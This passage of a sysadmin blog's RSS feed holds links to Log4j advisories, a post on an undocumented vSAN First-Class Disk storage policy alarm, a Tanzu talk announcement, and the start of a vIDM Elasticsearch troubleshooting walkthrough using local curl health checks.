<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">LunaSec blog post (Thanks Jonathan Regehr!): </span><a href="https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/"><span style="font-weight: 400;">https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Cloud Foundry post: </span><a href="https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/"><span style="font-weight: 400;">https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">VMware advisory: </span><a href="https://www.vmware.com/security/advisories/VMSA-2021-0028.html"><span style="font-weight: 400;">https://www.vmware.com/security/advisories/VMSA-2021-0028.html</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">VMware KB on products not affected: </span><a href="https://kb.vmware.com/s/article/87068"><span style="font-weight: 400;">https://kb.vmware.com/s/article/87068</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">BlueTeam CheatSheet, Advisories by all vendors</span><span style="font-weight: 400;"><br />
</span><a href="https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592"><span style="font-weight: 400;">https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592</span></a></li>
<li style="font-weight: 400;" aria-level="1"><a href="https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/"><span style="font-weight: 400;">https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/</span></a></li>
</ul>
<p><span style="font-weight: 400;">And when you need a laugh: </span><a href="https://log4jmemes.com/"><span style="font-weight: 400;">https://log4jmemes.com/</span></a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1712</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/12/log4jb.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1712</post-id>	</item>
		<item>
		<title>Mysterious vSAN datastore alert &#8211; and the relationship between First-Class disks and Cloud-Native storage</title>
		<link>https://thefluffyadmin.net/?p=1689</link>
					<comments>https://thefluffyadmin.net/?p=1689#comments</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Fri, 27 Aug 2021 15:56:57 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[storage]]></category>
		<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[CNS]]></category>
		<category><![CDATA[CSI]]></category>
		<category><![CDATA[enhanced virtual disk]]></category>
		<category><![CDATA[FCD]]></category>
		<category><![CDATA[first-class]]></category>
		<category><![CDATA[improved virtual disk]]></category>
		<category><![CDATA[IVD]]></category>
		<category><![CDATA[k8s]]></category>
		<category><![CDATA[vsan]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1689</guid>

					<description><![CDATA[Aug 27th, Robert Kloosterhuis ----------- I ran across an interesting 6.7 vSAN alarm today, that baffled me. This is vSphere 6.7 Update 3L (6.7.0.46000) &#160; Improved virtual disk infrastructure namespaces storage policy (alarm) So this is referring to the config setting we can find under Storage --&#62; vSAN Datastore object --&#62;  Configure -- General This <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1689">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>Aug 27th, Robert Kloosterhuis</p>
<p>-----------</p>
<p>I ran across an interesting 6.7 vSAN alarm today, that baffled me. This is vSphere 6.7 Update 3L (6.7.0.46000)</p>
<p>&nbsp;</p>
<p><code class="c-mrkdwn__code" data-stringify-type="code">Improved virtual disk infrastructure namespaces storage policy (alarm)</code></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1692" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=640%2C115&#038;ssl=1" alt="" width="640" height="115" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?w=1397&amp;ssl=1 1397w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=300%2C54&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=1024%2C185&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=768%2C139&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So this is referring to the config setting we can find under Storage --&gt; vSAN Datastore object --&gt;  Configure -- General</p>
<p>This is a config setting that was introduced.. uhh.. somewhere.. but I could not find <i data-stringify-type="italic">any</i> reference or documentation about it.</p>
<p>There is no mention of the policy setting at all in the official docs for 6.7 or 7.0 (  <a class="c-link" href="https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.virtualsan.doc/GUID-F52F0AE9-FB31-4236-B566-D9610B14C670.html" target="_blank" rel="noopener noreferrer" data-sk="tooltip_parent">https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.virtualsan.doc/GUID-F52F0AE9-FB31-4236-B566-D9610B14C670.html</a> ) .</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1690" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=640%2C257&#038;ssl=1" alt="" width="640" height="257" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?w=1668&amp;ssl=1 1668w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=300%2C120&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=1024%2C411&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=768%2C308&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=1536%2C616&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1691" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?resize=640%2C403&#038;ssl=1" alt="" width="640" height="403" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?w=864&amp;ssl=1 864w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?resize=300%2C189&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?resize=768%2C484&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>I suspect the alarm is being triggered in our case, because, as you can see from the screenshot, the setting was 'blank'.  I assume that in this case, it would revert to its default previous behaviour; to inherit the set VM Default Storage policy.  I am not sure about this though..  what would be the point of the alarm then?</p>
<p>But the wording between this config setting, and the warning, is all slightly different, so I am not sure.</p>
<p>'Home Storage Policy' vs 'Improved Virtual Disk Home Storage Policy' vs 'Improved virtual disk Infrastructure Namespaces Storage policy (alarm)'</p>
<p>So what is this referring to anyway??</p>
<p>&nbsp;</p>
<p>Cormac Hogan has a nice set of blog articles on this:</p>
<blockquote class="wp-embedded-content" data-secret="7TPGFBL1pc"><p><a href="https://cormachogan.com/2018/11/21/a-primer-on-first-class-disks-improved-virtual-disks/">A primer on First Class Disks/Improved Virtual Disks</a></p></blockquote>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted"  title="&#8220;A primer on First Class Disks/Improved Virtual Disks&#8221; &#8212; CormacHogan.com" src="https://cormachogan.com/2018/11/21/a-primer-on-first-class-disks-improved-virtual-disks/embed/#?secret=gpNet19oYX#?secret=7TPGFBL1pc" data-secret="7TPGFBL1pc" width="600" height="338" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe></p>
<p>and:</p>
<p><a href="https://cormachogan.com/2020/01/14/first-class-disks-enhanced-virtual-disks-revisited/">https://cormachogan.com/2020/01/14/first-class-disks-enhanced-virtual-disks-revisited/</a></p>
<p>&nbsp;</p>
<p>So Cormac's blog post is from 18 months ago. Has, in the meantime, VMware settled on a standard name for these things?</p>
<p>&nbsp;</p>
<p>First Class Disks (FCD)<br />
Improved Virtual Disk (IVD)<br />
Managed Virtual Disks<br />
Enhanced Virtual Disks</p>
<p>&nbsp;</p>
<p>It seems not, because while the vSphere 6.7 web client referred to these things as 'Improved Virtual Disks' , the vSAN/CNS part of VMware still calls them 'First-Class Disks, or FCD's for short.<br />
But no mention of IVD's anywhere in the core vSAN docs (I did a search across the 4 PDFs).   Its a shame cause this is pretty interesting technology.<br />
Ironically, they are mentioned far more as part of the vRealize 8 documentation, here are some links:</p>
<p><a href="https://docs.vmware.com/en/VMware-Cloud-Assembly/services/Using-and-Managing/GUID-64FB525D-CDE5-48BC-8B87-8DAAA6369776.html">https://docs.vmware.com/en/VMware-Cloud-Assembly/services/Using-and-Managing/GUID-64FB525D-CDE5-48BC-8B87-8DAAA6369776.html</a><br />
<a href="https://www.ntpro.nl/blog/archives/3630-vRealize-Automation-First-Class-Disk-FCD.html">https://www.ntpro.nl/blog/archives/3630-vRealize-Automation-First-Class-Disk-FCD.html</a><br />
<a href="https://vdc-repo.vmware.com/vmwb-repository/dcr-public/b83a47dc-134c-4295-a7a0-212b858e2a3c/9e342828-face-41ab-9f23-c539f72468c5/GUID-3FB348EE-46F0-46F6-A99E-BC1388604FC4.html">https://vdc-repo.vmware.com/vmwb-repository/dcr-public/b83a47dc-134c-4295-a7a0-212b858e2a3c/9e342828-face-41ab-9f23-c539f72468c5/GUID-3FB348EE-46F0-46F6-A99E-BC1388604FC4.html</a></p>
<p>&nbsp;</p>
<p>Here is a mention of them, in regards to how they are used in Cloud Native Storage (or CNS). And in fact, this CNS use <em>appears</em> to be the primary use-case of FCD's being added to vSphere in the first place. But good luck finding that out :p</p>
<p>&nbsp;</p>
<p><a href="https://core.vmware.com/blog/whats-new-vsphere-7-update-2-core-storage">https://core.vmware.com/blog/whats-new-vsphere-7-update-2-core-storage</a></p>
<p>&nbsp;</p>
<blockquote><p><em>Persistent Volumes (PV) are created in vSphere as First-Class Disks (FCD). FCDs are independent disks with no VM attached. With the release of vSphere 7.0 U2, we are adding snapshot support of up to 32 snapshots for FCDs. This enables you to create snapshots of your K8s PVs which goes along with the SPBM multiple snapshot rules.</em></p>
<p>&nbsp;</p></blockquote>
<p>&nbsp;</p>
<p>More information on the vSphere CSI is here:<br />
<a href="https://vsphere-csi-driver.sigs.k8s.io/">https://vsphere-csi-driver.sigs.k8s.io/</a></p>
<p>This is actually pretty important..  if in the vSphere CSI (Container Storage Interface) for Kubernetes, Persistent Volumes are FCD objects...  and you can be in a situation where there is <em>no </em>default policy applied to them in vSAN.. then.. uhh.. they are NOT protected. Right?</p>
<p>Well.. no .. because even if this config setting is left blank, CNS objects seem to inherit the default storage policy set for the vSAN datastore. I double checked:</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1697" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=640%2C325&#038;ssl=1" alt="" width="640" height="325" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?w=1560&amp;ssl=1 1560w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=300%2C152&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=1024%2C519&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=768%2C389&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=1536%2C779&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So to my mind.. that makes the alert message...  well.. pointless?</p>
<p>&nbsp;</p>
<p>It should be noted that in vSphere with Tanzu (TKGs), the storage policy for these kinds of objects is handled quite differently. The associated vSAN storage policy is in that case, associated with the <em>vSphere Namespace </em></p>
<p>&nbsp;</p>
<p>Here are some slides I made that explain how that works:</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1693" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=640%2C350&#038;ssl=1" alt="" width="640" height="350" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?w=1332&amp;ssl=1 1332w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=300%2C164&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=1024%2C560&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=768%2C420&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a> <a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1694" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=640%2C370&#038;ssl=1" alt="" width="640" height="370" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?w=1305&amp;ssl=1 1305w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=300%2C173&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=1024%2C592&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=768%2C444&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a> <a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1695" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=640%2C384&#038;ssl=1" alt="" width="640" height="384" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?w=1337&amp;ssl=1 1337w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=300%2C180&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=1024%2C614&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=768%2C461&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Up to today, the vCenter alarm <code class="c-mrkdwn__code" data-stringify-type="code">Improved virtual disk infrastructure namespaces storage policy alarm)</code> was completely ungooglable. That is the main reason for this blog post now existing.</p>
<p>&nbsp;</p>
<p>But I hope this simultaneously explains a bit about what this 'Improved Virtual Disks' are all about. I was a little shocked how <em>little</em> there is in the form of official documentation around this, from VMware.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1689</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png</image><post-id xmlns="com-wordpress:feed-additions:1">1689</post-id>	</item>
		<item>
		<title>Speaking about Tanzu Kubernetes Grid at VMWorld2021 Code Connect and the UK- North West England VMUG!</title>
		<link>https://thefluffyadmin.net/?p=1677</link>
					<comments>https://thefluffyadmin.net/?p=1677#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Fri, 20 Aug 2021 10:36:28 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmug]]></category>
		<category><![CDATA[vmworld]]></category>
		<category><![CDATA[kubernetes]]></category>
		<category><![CDATA[speaking]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[tkg]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1677</guid>

					<description><![CDATA[Aug 20th, Robert Kloosterhuis &#160; Its been a very Tanzu year for me, after my 'Tanzu for Dummies Beginners' session (and CMTY Podcast appearance),  I am continuing to do some public speaking about Tanzu topics the coming months! &#160; I will be focussing on TKG itself, and more specifically the 3 different flavors of Tanzu <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1677">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<pre>Aug 20th, Robert Kloosterhuis</pre>
<p>&nbsp;</p>
<p>Its been a very Tanzu year for me, after my <a href="https://www.youtube.com/watch?v=MT7eNuQusu4">'Tanzu for <del>Dummies</del> Beginners'</a> session (and <a href="https://thefluffyadmin.net/?p=1658">CMTY Podcast appearance</a>),  I am continuing to do some public speaking about Tanzu topics the coming months!</p>
<p>&nbsp;</p>
<p>I will be focussing on TKG itself, and more specifically the 3 different flavors of Tanzu Kubernetes Grid that VMware currently has available: TKGi (ex Pivotal PKS), TKG(m), and TKG(s) (aka 'vSphere with Tanzu') and the differences between them.  I am gonna deep dive into each version, look at how they are deployed, how they are used, and compare the configuration and design choices you will face with each.</p>
<p>&nbsp;</p>
<h2>VMworld 2021 Code Connect - The State of the TKG Art [CODE2780] - Oct 5</h2>
<p>Via the <a href="https://code.vmware.com/home">VMware{code} Program,</a>  (in which I am a Code Coach) , and the Code Connect event that is attached to VMworld2021 this year, I have a session that you can find in the VMworld scheduler!</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1678" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?resize=640%2C309&#038;ssl=1" alt="" width="640" height="309" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?w=965&amp;ssl=1 965w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?resize=300%2C145&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?resize=768%2C371&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Use this search string to find it:</p>
<p><a href="https://myevents.vmware.com/widget/vmware/vmworld2021/catalog?search=tkg">https://myevents.vmware.com/widget/vmware/vmworld2021/catalog?search=tkg</a>, or just look for CODE2780</p>
<p>&nbsp;</p>
<p>I would also like to highlight the Session by Scott Rosenberg, Adding Custom Logic to TKG Cluster Deployment [CODE2749]</p>
<p>&nbsp;</p>
<h2>UK- North West England VMUG - Sep 9</h2>
<p><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">Nathan Byrne (<span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-jwli3a r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/Vm_nathbyrne">@Vm_nathbyrne</a>)</span> very graciously invited me to speak at the UK North West VMUG (<a href="https://twitter.com/NWEnglandVMUG">@NWEnglandVMUG</a>).</span></p>
<p>&nbsp;</p>
<p>Sign-up for it here:<br />
<a href="https://my.vmug.com/s/community-event?id=a1Y4x00000020cTEAQ">https://my.vmug.com/s/community-event?id=a1Y4x00000020cTEAQ</a></p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1677</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png</image><post-id xmlns="com-wordpress:feed-additions:1">1677</post-id>	</item>
		<item>
		<title>vIDM Elasticsearch failing due to idm plugin messing with node count &#8211; hard fix</title>
		<link>https://thefluffyadmin.net/?p=1663</link>
					<comments>https://thefluffyadmin.net/?p=1663#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Mon, 29 Mar 2021 17:43:02 +0000</pubDate>
				<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[elastic]]></category>
		<category><![CDATA[elasticsearch]]></category>
		<category><![CDATA[idm]]></category>
		<category><![CDATA[vIDM]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1663</guid>

					<description><![CDATA[Robert Kloosterhuis, march 29, 2021 &#160; &#160; I ran into a strange issue with a vIDM 3.3.2.0 appliance today &#160; (vIDM , or 'VMware Identity Manager' , is now called 'VMware Workspace ONE Access') &#160; The issue I had involved a single-node deployment. &#160; This is an important detail. vIDM can be clustered, and that <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1663">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>Robert Kloosterhuis, march 29, 2021</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p>I ran into a strange issue with a vIDM 3.3.2.0 appliance today</p>
<p>&nbsp;</p>
<p>(vIDM , or 'VMware Identity Manager' , is now called 'VMware Workspace ONE Access')</p>
<p>&nbsp;</p>
<p>The issue I had involved a single-node deployment.</p>
<p>&nbsp;</p>
<p><em><strong>This is an important detail. vIDM can be clustered, and that means that many of the services it runs inside (RabbitMQ, Elasticsearch) can also be clustered.<span style="color: #ff0000;"> The 'fix' I describe in this post (actually more of a workaround), should only ever be attempted on a single-node deployment. It will break the ability to make your vIDM install clustered. </span>  This is unsupported and totally at your own risk. </strong></em></p>
<p>&nbsp;</p>
<p>The issue was this:</p>
<p>&nbsp;</p>
<p>I was getting frequent errors in the vIDM user interface, referencing the Analytics service.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1664" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?resize=472%2C129&#038;ssl=1" alt="" width="472" height="129" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?w=472&amp;ssl=1 472w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?resize=300%2C82&amp;ssl=1 300w" sizes="auto, (max-width: 472px) 100vw, 472px" /></a></p>
<p>&nbsp;</p>
<p>"Call to Analytics failed with status: 500"</p>
<p>&nbsp;</p>
<p>The Analytics service is, basically, a local installation of Elasticsearch, included on the vIDM appliances. And clustered if you have more than 1 vIDM node.</p>
<p>&nbsp;</p>
<p>I don't have any screenshot myself, but this post also nicely demonstrates what you would see in the vIDM Health Dashboard:</p>
<p>&nbsp;</p>
<p>https://geekcubo.com/vmware-identity-manager-cluster-19-03-elastic-search-service-issues/</p>
<p>Basically the 'Integrated Components' check in the Health Dashboard would be red. But in my case, no data at all was being produced by Elasticsearch. All the values where 'unknown'.</p>
<p>&nbsp;</p>
<p>To troubleshoot, we need to ssh into the vIDM VM, with the local 'sshuser' account. And then sudo to root.</p>
<p>&nbsp;</p>
<p>When I tried to troubleshoot, it was obvious that I could not even get into the Elasticsearch API at all. It was throwing nothing but error 500's</p>
<p>&nbsp;</p>
<pre>curl 'http://localhost:9200/_cluster/health'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}

curl -XGET 'http://localhost:9200/_cat/indices?v'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}</pre>
<p>&nbsp;</p>
<p>The elasticsearch log can be found here:  /opt/vmware/elasticsearch/logs/horizon.log</p>
<p>&nbsp;</p>
<p>I tailed it, and gave elasticsearch itself a restart</p>
<p>&nbsp;</p>
<pre>service elasticsearch restart

Stopping elasticsearch: process in pidfile `/opt/vmware/elasticsearch/elasticsearch.pid'done.
horizon-workspace service is running
Waiting for IDM: Ok.
Number of nodes in cluster is : 1
Configuring /opt/vmware/elasticsearch/config/elasticsearch.yml file

</pre>
<p>&nbsp;</p>
<p>I then tried to ask its health status a few times while it started, to see if it came up at all.</p>
<p>&nbsp;</p>
<p>Briefly, it did, before it died again!</p>
<p>&nbsp;</p>
<pre>

curl 'http://localhost:9200/_cluster/health?pretty'rt
{
"cluster_name" : "horizon",
"status" : "yellow",
"timed_out" : false,
"number_of_nodes" : 1,
"number_of_data_nodes" : 1,
"active_primary_shards" : 60,
"active_shards" : 60,
"relocating_shards" : 0,
"initializing_shards" : 0,
"unassigned_shards" : 60,
"delayed_unassigned_shards" : 0,
"number_of_pending_tasks" : 0,
"number_of_in_flight_fetch" : 0,
"task_max_waiting_in_queue_millis" : 0,
"active_shards_percent_as_number" : 50.0
}

</pre>
<p>When I examined the log, it saw pretty quickly why I was getting an error 500.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1665" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=640%2C207&#038;ssl=1" alt="" width="640" height="207" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=300%2C97&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=1024%2C331&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=768%2C248&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=1536%2C496&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=2048%2C662&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>It shows Elasticsearch is starting normally. It then discovers it has 244 indices to clean up (more on that later), so its sets health to yellow. But that is fine. At least its not a complete fail.</p>
<p>&nbsp;</p>
<p>But then something odd happens.</p>
